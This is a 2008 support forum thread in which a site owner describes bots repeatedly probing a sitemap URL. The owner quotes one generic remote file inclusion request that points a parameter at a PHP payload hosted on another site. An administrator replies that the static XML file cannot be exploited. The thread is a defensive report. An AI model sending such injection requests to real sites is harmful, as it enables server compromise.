XML Sitemaps Generator

Author Topic: Security: Repeated perl bot attack attempts targeting sitemap  (Read 19063 times)

websitebob

  • Registered Customer
  • Approved member
  • *
  • Posts: 1
Security: Repeated perl bot attack attempts targeting sitemap
« on: January 01, 2008, 11:16:19 PM »
Hi all.

In following my site's traffic, I've noticed persistent attack attempts by bots specifically targeting the sitemap.  The user agent is almost always libwww-perl/5.805.  The bots typically reference a php instruction that has been uploaded onto someone else's site in a text file. The code on the text file is what the bot attempts to inject into the form on the target page (i.e. the admin login).

Here is a generic example of an attempt:
   
/sitemap.xml/index.php?action=http://otherwebsite/folder/textfile.txt??

XML-SITEMAPS, of course, creates an admin login page, but not at the location of the XML file that is generated.

Are there are any known security issues with these types of attacks?
Thanks
websitebob

XML-Sitemaps Support

  • Administrator
  • Hero Member
  • *****
  • Posts: 10625
Re: Security: Repeated perl bot attack attempts targeting sitemap
« Reply #1 on: January 02, 2008, 06:46:26 PM »
Hello,

xml sitemap is NOT an executable page so it cannot be exploited in any way, this must be a bot script that just attempts to attach parameters to any found URL on the site.
Oleg Ignatiuk
www.xml-sitemaps.com
Send me a Private Message

For maximum exposure and traffic for your web site check out our additional SEO Services.

 

SMF 2.0.12 | SMF © 2014, Simple Machines
XHTML RSS WAP2